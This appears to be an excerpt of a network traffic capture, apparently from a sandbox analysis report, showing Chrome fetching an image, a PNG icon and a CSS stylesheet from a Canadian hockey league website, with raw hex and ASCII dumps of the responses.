                                                                                                                          2025-01-13 21:01:13 UTC2179INData Raw: 0d 31 0a 60 3c 95 30 b7 7f 11 41 95 20 98 d3 62 35 f2 b0 46 16 82 56 fb 2a 08 0e 24 88 1d 41 9d 07 6d 60 ff 00 e7 7c c2 3e a9 bc ab 2c e4 20 92 48 49 03 b6 87 5e d2 7f a6 b6 06 8d a9 4c be 95 21 32 75 03 40 98 d7 68 fe 3d ec 0f 5d 53 69 39 d0 92 12 54 14 91 9b 70 24 01 3d 3b 58 01 f6 1c 05 4a 0d 06 d0 8d 52 d8 f8 e9 f2 3e 53 e5 60 4d 94 38 5c 01 b6 cb 8e 42 89 33 a9 ef f0 3b 7e 76 00 1b 25 a0 d8 83 96 64 15 0d f5 8f 98 df bd 81 20 b4 ce 5d 7c 42 73 12 41 03 5f 2e d1 f2 b0 04 02 d2 48 6c 13 a4 10 75 50 8d 81 dc 45 80 14 a5 2d 04 82 46 40 0e ba 1e c4 1f af ca c0 44 84 84 ae 73 19 3f 87 6d 7c bb 7d 6c 06 0e 15 2c b6 0e 59 99 e8 77 9e bb 93 60 d5 3d 9b ae 87 2f 0e 2d dd 4b e5 21 6d d1 36 ed 42 96 b4 8f 00 0d a8 03 3d 82 88 f9 d8 3d aa 81 0a ca 90 09 58 f1 4c
                                                                                                                          Data Ascii: 1`<0A b5FV*$Am`|>, HI^L!2u@h=]Si9Tp$=;XJR>S`M8\B3;~v%d ]|BsA_.HluPE-F@Ds?m|}l,Yw`=/-K!m6B==XL
                                                                                                                          2025-01-13 21:01:13 UTC12792INData Raw: 5a 60 3a 93 30 bf 31 a1 b0 6a bc 12 c6 f4 d5 b4 77 8e 0b c4 88 5b b7 6d 43 8d 3f 4c fb 6a 28 5d 3b bd 08 56 f1 a0 8f 43 a1 06 2c 15 de 39 dc 4e dd d5 eb e6 12 f2 e8 5c 09 43 ca 4e 45 29 95 6a d9 1d 08 23 a8 d3 48 b0 66 e9 aa 45 45 17 31 2a 08 70 14 a4 a9 26 3c 32 23 4d 4f 7f 9c d8 18 3e d8 50 39 90 b7 07 30 91 1a 81 a1 88 fa fc ec 0d 07 24 a9 46 08 cb a4 92 74 9d 8f 72 35 fa 58 17 68 ba 53 91 28 42 73 ca 92 a8 03 4d 66 0f 6d be c1 b0 73 c9 6c 20 9f 1a 94 32 fe 10 00 12 46 fb 77 3a c4 6b 60 1a 57 d7 46 82 92 da 5c 52 10 a4 a4 14 8c a0 9e bd 09 3a 8b 02 79 92 69 b3 3a a5 44 f8 ca 60 c1 93 07 eb f5 f9 82 25 03 30 04 85 66 04 90 93 a9 ec 74 1a ed f5 f9 81 54 54 dc e5 5a 55 9a 40 ff 00 2c 11 fb 8f cf ce c0 45 25 01 2a 42 57 e2 4e d3 ae b3 ae b6 00 2d 2f 94 95
                                                                                                                          Data Ascii: Z`:01jw[mC?Lj(];VC,9N\CNE)j#HfEE1*p&<2#MO>P90$Ftr5XhS(BsMfmsl 2Fw:k`WF\R:yi:D`%0ftTTZU@,E%*BWN-/
                                                                                                                          2025-01-13 21:01:13 UTC4616INData Raw: 80 4e c3 4f 3f 8f d2 c0 52 00 70 40 2a 3a 18 3a 47 f0 b0 18 66 08 29 27 49 e8 9d 44 47 cf f9 58 0a 02 54 02 80 2a 3b 28 1d 07 cc 74 b0 19 a5 64 73 58 ca 08 02 23 f3 e9 60 32 56 51 95 2b 68 77 24 e9 db e1 60 e5 14 94 e5 4c 78 bc 22 34 ed 3a 77 b0 14 64 c8 ad 7e 1a 7e 7e 9f 97 a5 80 a6 02 a4 9d 4e 90 3a 6f 60 16 e3 98 95 00 44 46 9d 36 ef f3 b0 08 21 24 12 0f 78 df 5d 66 c0 1a 19 94 8d 35 22 3c a6 c0 65 a5 3b 18 4e bb 76 ef 60 2a 10 a9 29 54 cf 97 4d ec 06 4e 45 19 4a 4f e1 eb d7 e3 df 5b 06 c1 ec cf c3 7c 3d c4 7c 5f 78 d3 62 2a 65 55 d1 51 d1 17 7d df 9a b6 8b 8b 2b 09 04 94 10 60 02 7a ef 16 0f 52 52 f0 07 86 34 85 3c bc 1b 77 28 a7 ff 00 1c 56 ec e9 1a e6 51 9f 8f ae f6 07 34 dc 10 e1 ad 22 96 5b c1 77 2a 8a e2 79 ac 07 36 ed 9a 63 ce 37 eb 60 7a 8e 12
                                                                                                                          Data Ascii: NO?Rp@*::Gf)'IDGXT*;(tdsX#`2VQ+hw$`Lx"4:wd~~~N:o`DF6!$x]f5"<e;Nv`*)TMNEJO[|=|_xb*eUQ}+`zRR4<w(VQ4"[w*y6c7`z
                                                                                                                          2025-01-13 21:01:14 UTC12792INData Raw: 9d 78 71 7f 60 0b 82 fb bd 6e 67 ab ab 6b a9 10 fb ae 2a b1 e4 02 54 36 84 28 00 2c 18 c7 b4 e6 02 b8 38 7b 8d a8 68 70 dd 12 a8 e9 6a 6e f4 54 ad 92 e2 dc ca be 62 d3 a2 94 49 00 84 8d 27 71 60 c8 8a 64 05 67 00 ef 24 8d bb 7c 22 c1 65 e1 a6 16 63 19 e3 bb 8e e0 ae 75 f6 69 6b aa 83 2e ba c2 80 71 22 09 21 24 82 01 81 d8 8d 76 b0 7b 26 93 d9 6f 85 74 cc 25 a7 30 fb d5 2b 09 ca 5d 7a bd fc ca 3d ce 55 81 3e 80 0f 2b 02 ec 7b 33 70 a5 82 0a 30 b2 49 02 3c 75 6f aa 7c f5 59 b0 1c 7b 37 f0 c3 30 8c 34 d0 ca 41 8e 62 f5 83 b4 cc fc 8f 5b 05 8a 9f 84 9c 3f a4 1f aa c1 38 73 68 f1 5d ed 2b f3 49 b0 79 f7 82 1c 35 c1 f8 87 8b 38 fa 9a f8 ba da aa fd 0b 5e ea 28 28 96 25 84 23 9c ea 49 20 68 4a 40 40 00 e9 ac c4 8d 02 4f da c7 86 77 0d d7 84 a8 71 1d c7 73 5d f7
                                                                                                                          Data Ascii: xq`ngk*T6(,8{hpjnTbI'q`dg$|"ecuik.q"!$v{&ot%0+]z=U>+{3p0I<uo|Y{704Ab[?8sh]+Iy58^((%#I hJ@@Owqs]
                                                                                                                          2025-01-13 21:01:14 UTC4616INData Raw: 7d 2d 07 5c f8 c6 fd b8 2e 6b de e6 bb 2b 83 14 17 d2 1b 6e bd 9e 52 15 cf 4a 0a b2 8c ca 49 29 8c c7 f0 91 bd 82 1d 23 60 01 93 a0 f3 36 a2 db 78 71 3b 17 3d 7f 5d 97 e3 b7 db a2 fa ba e9 91 47 4b 54 d2 10 d9 61 94 e6 86 e1 09 01 5f 8d 53 20 c8 30 66 c9 e8 2c 15 1e d2 dc 58 ab 61 c6 1e c5 6a 2d 38 92 85 04 d0 53 24 90 46 ba 86 e4 5a 0a dd 17 12 f1 45 df 41 71 5d ec 5e 69 4d 36 1f a8 55 5d d8 d9 a6 65 5e ee ea 94 54 55 25 04 ab c4 a2 7c 53 1d 2d 44 46 23 c4 77 a6 2b be aa af ab ee ac d5 de 15 6a 0a 79 e5 25 29 2b 20 00 34 48 00 00 00 10 04 69 60 b0 d3 f1 8f 1d 52 b9 87 9f 6e fd f1 e1 c6 96 cd d6 e2 a9 18 52 a9 90 b6 f9 6a 4c 94 12 a0 50 00 f1 4e da 6a 2d 04 cb de d3 9c 58 79 a5 b4 ee 2b cc 87 12 52 a1 fa 3e 97 50 44 11 fd d5 82 99 84 31 b6 20 c0 97 a2 ef
                                                                                                                          Data Ascii: }-\.k+nRJI)#`6xq;=]GKTa_S 0f,Xaj-8S$FZEAq]^iM6U]e^TU%|S-DF#w+jy%)+ 4Hi`RnRjLPNj-Xy+R>PD1
                                                                                                                          2025-01-13 21:01:14 UTC10184INData Raw: 8a ed ce 54 9f 79 7f fd 62 b0 82 4c f8 b6 4f 50 00 10 01 ef 60 cd 2a ca ea 1e 55 43 ef 3f 50 e6 a5 4b 59 df bc 4c e9 ad 80 ab a6 a4 6d 09 30 be 60 8e da 69 a7 e5 f5 f3 b0 19 14 ec e5 3c b4 bc ca 8c 4a ce c0 83 b0 83 f1 ff 00 9b 60 b2 e1 cc 7f 8b 30 f1 68 5d 38 92 be 99 b4 7e 16 4b d9 d1 1d 06 55 48 8d ba 46 a2 c1 a9 61 df 69 9b f2 ee 6d 0d 62 0b b6 8e f4 98 ca eb 63 94 e0 1d fa a7 e9 d3 7b 04 0e 31 c4 d8 4b 13 3e ed 5d d3 50 fd 2b 35 af 73 5e bb aa d0 25 a7 4c 4b ad 28 12 14 92 63 c2 48 f2 d0 81 60 cf 6f 04 d7 e1 b7 db a8 a1 75 f6 a1 59 d9 a9 a7 51 19 14 0c c8 3a 41 db b7 9d 82 d5 8d b8 8b 74 f1 07 09 21 17 9b 4b a7 bf 9b 09 5f bd 32 b0 50 eb 89 1a 97 13 b0 24 01 05 23 79 b0 66 55 c1 45 84 ba 99 9c a0 95 02 3c 42 75 13 e5 60 60 a4 65 75 4a cc 72 0d 54 63
                                                                                                                          Data Ascii: TybLOP`*UC?PKYLm0`i<J`0h]8~KUHFaimbc{1K>]P+5s^%LK(cH`ouYQ:At!K_2P$#yfUE<Bu``euJrTc
                                                                                                                          2025-01-13 21:01:14 UTC6396INData Raw: 38 0f dd 55 4f 96 29 1a 34 aa 5e 7c e8 2b 4b 8b 95 23 fc a4 65 b0 65 89 6d e2 a0 90 e1 5a 06 85 4a fb ef 60 32 50 cb 6d a8 ad 2b 31 d7 34 1f bd ec 04 29 24 95 07 0c 6b 20 80 34 fb 8f 9d 80 85 f0 88 42 de 0b 03 68 48 d2 c1 0b 94 4e fb 58 00 49 eb 23 d6 c0 1b 6c 4d 80 d0 94 f7 36 02 74 da 2c 01 12 76 36 0f 4c e0 3e 08 70 e6 e2 e1 4d 36 3f e2 2a eb 2a 9a a8 65 35 0a 6d b7 1c 43 6d 21 6a 09 6d 29 4b 70 b5 28 e6 4c 99 8d 76 00 4d 81 db dc 31 e0 5e 3e c0 d7 9d e9 83 2a 3f 44 56 d3 a1 d4 b2 5f ac 71 2a e7 25 19 82 54 db ca 32 93 23 54 f7 d0 c8 b0 54 fd 9a b8 39 87 31 dd d5 7f e2 0c 5f 4a b7 ae ba 22 96 59 21 f5 b4 90 b0 92 b7 14 4a 48 3e 14 94 7f e7 59 20 fe d1 1c 20 c2 f8 4b 0b 61 ec 5b 82 29 5d 66 eb ae 21 0f 12 f2 dd 0a 0e 20 2d a5 8c c4 91 20 2e 7d 45 90 34
                                                                                                                          Data Ascii: 8UO)4^|+K#eemZJ`2Pm+14)$k 4BhHNXI#lM6t,v6L>pM6?**e5mCm!jm)Kp(LvM1^>*?DV_q*%T2#TT91_J"Y!JH>Y Ka[)]f! - .}E4
                                                                                                                          2025-01-13 21:01:14 UTC4511INData Raw: 45 7e ec 91 4e d3 45 39 f2 e6 fe ed 09 99 c8 9d e7 6d 2c 12 1c 3f c6 d8 cf 87 69 ac 56 1a bd c5 d4 2b b9 7e f0 9f 77 69 e2 e6 4c d9 7f bc 4a a2 33 ab 68 df 5b 5d 05 31 6e 29 be f1 dd e8 cd eb 89 6b bf 48 57 32 c0 a7 43 ca 65 b6 ca 5b 0a 52 80 84 25 23 75 28 cc 4e b6 74 16 6b b3 8e bc 49 b9 e9 1b a4 a5 c5 35 25 a6 c0 09 e7 b0 cb ea 8e d9 9c 41 57 d6 d7 50 0f 57 ed 05 c5 6a 94 72 d3 8a cb 68 50 21 4a 4d 15 30 57 c0 86 e4 7c 2d 34 28 35 ce 56 de b7 a3 b7 ad e5 5b 53 5d 5c fa b3 39 50 fb 85 4b 59 ef 27 e9 da 2c 17 cb ab 8e 3c 49 b9 e9 13 49 4b 8a aa 8b 48 00 27 de 1a 69 f5 00 3a 66 71 0a 3f 5b 5d 40 3b fc 78 e2 65 4e 6c f8 aa a4 66 df 96 cb 48 f9 42 04 7c 2c d4 0a fe 1d c7 38 93 09 df 95 77 ed cf 78 aa 9a f2 ab 42 d0 fb e5 a6 dc 2e 05 ac 2d 52 16 92 35 52 52
                                                                                                                          Data Ascii: E~NE9m,?iV+~wiLJ3h[]1n)kHW2Ce[R%#u(NtkI5%AWPWjrhP!JM0W|-4(5V[S]\9PKY',<IIKH'i:fq?[]@;xeNlfHB|,8wxB.-R5RR


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.11.204980354.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC652OUTGET /app/uploads/gthl/2024/08/29093928/icons8-facebook-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:13 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 889
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:29 GMT
                                                                                                                          ETag: "ceda85dc6354796fd08c69a2032d2b29"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 a2da30f5dacfbd28d77cf4c9702318f8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: vVdtJHIq76WpSbgMTPR-wVTWN0Gej-SgovXYfBtgzgMOzWlYMpKgqg==
                                                                                                                          2025-01-13 21:01:13 UTC889INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 2b 49 44 41 54 78 9c ed 99 cf 4f 13 41 14 c7 37 33 34 31 01 e2 c5 a3 27 23 68 c4 e0 c9 ab ff 80 3f a2 47 a3 de bd 28 02 7f 80 89 89 1e f4 86 24 a4 33 45 0c 09 11 aa 89 07 2f 86 c4 13 31 5e 94 8a 80 24 fe 48 0c fb de b6 b5 d0 02 15 d2 b2 b4 63 a6 56 0c 6e 81 9d 9d dd 2d 87 fd 26 ef d4 cd ec f7 33 f3 e6 cd ec ab 61 44 8a 14 29 92 54 6c d8 3c 43 18 f4 51 86 49 c2 70 86 72 cc 53 8e 9b f5 c8 13 86 1f 6b bf 71 b3 57 3e 6b 1c 08 25 72 ed 84 43 3f 65 f0 99 72 14 4a c1 60 5e 02 1b 83 d9 b6 f0 8d df 15 2d 72 26 29 c3 65 65 e3 0e 10 5c 22 0c ef c8 31 c3 31 1f c7 93 84 63 4a db f8 7f 41 18 4e 1b 09
                                                                                                                          Data Ascii: PNGIHDR00WpHYs+IDATxOA7341'#h?G($3E/1^$HcVn-&3aD)Tl<CQIprSkqW>k%rC?erJ`^-r&)ee\"11cJAN


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.11.2049805137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:14 UTC608OUTGET /app/themes/base/assets/dist/css/core.css HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:14 UTC495INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:14 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 143310
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:13:09 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417808 961970686
                                                                                                                          Age: 115
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069c5-22fce"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:14 UTC15889INData Raw: ef bb bf 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2f 32 2e 31 2e 32 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 29 3b 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 37 30 30 2c 33 30 30 2c 36 30 30 29 3b 2e 66 69 6c 74 65 72
                                                                                                                          Data Ascii: @import url(https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css);@import url(https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,700,300,600);.filter
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 2e 62 72 61 63 6b 65 74 5f 5f 68 65 61 64 65 72 2d 73 70 6f 6e 73 6f 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77 69 64 74 68 3a 35 30 25 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 7d 2e 62 72 61 63 6b 65 74 5f 5f 68 65 61 64 65 72 2d 73 70 6f 6e 73 6f 72 2d 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 62 72 61 63
                                                                                                                          Data Ascii: in-width: 1200px){.bracket__header-sponsor{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;width:50%;float:left}}.bracket__header-sponsor-img{display:block;width:auto;height:100%;margin:0 auto}@media (min-width: 768px){.brac
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 74 7b 77 69 64 74 68 3a 37 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 2e 66 6f 6f 74 65 72 2d 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 39 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 35 70 78 20 30 7d 7d 2e 66 6f 6f 74 65 72 2d 6d 65 6e 75 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 30 70 78 20 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 6f 6f 74 65 72 2d 6d 65 6e 75 2d 2d 65 6d 70 74 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 66 6f 6f 74 65 72 2d 6d 65 6e 75 5f 5f 69 74 65 6d 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 66 6f 6f
                                                                                                                          Data Ascii: t{width:728px;padding:0}}@media (min-width: 1200px){.footer-content{width:940px;padding:0 0 15px 0}}.footer-menu{margin:0 0 10px 0;padding:0}.footer-menu--empty{font-size:1em;font-weight:bold}.footer-menu__item{margin:0;padding:0;list-style-type:none}.foo
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 20 2f 20 35 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 20 2f 20 35 30 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 32 73 20 65 61 73 65 2d 6f 75 74 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 32 33 70 78 29 20 73 63 61 6c 65 28 31 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 33 70 78 5c 39 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 5c 30 7d 2e 67 61 6d 65 63 65 6e 74 72 65 2d 69 63 65 72 69 6e 6b 5f 5f 65 76 65 6e 74 2d 6d 61 72 6b 65 72 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 6e 6f 6e 65 7d 2e 67 61 6d 65 63 65 6e 74 72 65 2d 69 63 65 72 69 6e 6b 5f 5f 65 76 65 6e 74 2d 6d 61 72 6b 65 72 2d
                                                                                                                          Data Ascii: border-radius:100px / 50px;border-radius:100px / 50px;transition:all 0.2s ease-out;transform:translateY(23px) scale(1);margin-top:23px\9;margin-top:0px\0}.gamecentre-icerink__event-marker::selection{background-color:none}.gamecentre-icerink__event-marker-
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 7d 2e 6c 65 61 67 75 65 2d 73 74 61 72 73 2e 6c 65 61 67 75 65 2d 73 74 61 72 73 2d 2d 68 6f 6d 65 70 61 67 65 2d 73 69 64 65 62 61 72 20 2e 6c 65 61 67 75 65 2d 73 74 61 72 5f 5f 61 76 61 74 61 72 2d 73 72 63 2c 2e 6c 65 61 67 75 65 2d 73 74 61 72 73 2e 6c 65 61 67 75 65 2d 73 74 61 72 73 2d 2d 68 6f 6d 65 70 61 67 65 2d 62 6f 74 74 6f 6d 2d 61 20 2e 6c 65 61 67 75 65 2d 73 74 61 72 5f 5f 61 76 61 74 61 72 2d 73 72 63 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 68 65 69 67 68 74 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 6c 65 61 67 75 65 2d 73 74 61
                                                                                                                          Data Ascii: 10px;background:white}.league-stars.league-stars--homepage-sidebar .league-star__avatar-src,.league-stars.league-stars--homepage-bottom-a .league-star__avatar-src{width:100%;max-width:100%;height:auto;max-height:none}}@media (min-width: 768px){.league-sta
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 70 6c 61 79 65 72 2d 70 72 6f 66 69 6c 65 2d 70 72 69 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 35 30 70 78 29 7d 2e 70 6c 61 79 65 72 2d 70 72 6f 66 69 6c 65 2d 70 72 69 6d 61 72 79 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 70 6c 61 79 65 72 2d 70 72 6f 66 69 6c 65 2d 70 72 69 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 37 30 70 78 7d 7d 40 6d 65 64 69 61 20 28
                                                                                                                          Data Ascii: player-profile-primary{display:inline-block;position:relative;vertical-align:top;padding:10px;width:calc(100% - 50px)}.player-profile-primary:first-child{border-top:none}@media (min-width: 768px){.player-profile-primary{display:block;width:270px}}@media (
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 2d 64 61 74 65 2c 2e 74 61 62 6c 65 5f 5f 74 68 2d 2d 73 63 68 65 64 75 6c 65 2d 6c 6f 67 6f 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 5f 5f 74 68 2d 2d 73 63 68 65 64 75 6c 65 2d 6c 6f 67 6f 2d 61 77 61 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 73 63 68 65 64 75 6c 65 2d 64 61 74 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 73 63 68 65 64 75 6c 65 2d 74 69 6d 65 2c 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 73 63 68 65 64 75 6c 65 2d 73 63 6f 72 65 2c 2e 74 61 62 6c 65 5f 5f 74 64 2d 2d 6c 69 6e 6b 73 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e
                                                                                                                          Data Ascii: -date,.table__th--schedule-logo{text-align:left !important}.table__th--schedule-logo-away{text-align:right !important}.table__td--schedule-date{text-align:left !important}.table__td--schedule-time,.table__td--schedule-score,.table__td--links{white-space:n
                                                                                                                          2025-01-13 21:01:14 UTC16384INData Raw: 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 67 61 6d 65 5f 5f 64 65 74 61 69 6c 73 2d 2d 6c 65 61 67 75 65 2d 2d 61 63 74 69 76 65 2d 2d 77 61 74 63 68 2c 2e 67 61 6d 65 5f 5f 64 65 74 61 69 6c 73 2d 2d 6c 65 61 67 75 65 2d 2d 61 63 74 69 76 65 2d 2d 74 69 63 6b 65 74 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 2e 35 65 6d 7d 2e 67 61 6d 65 5f 5f 64 65 74 61 69 6c 73 2d 2d 6c 65 61 67 75 65 2d 2d 61 63 74 69 76
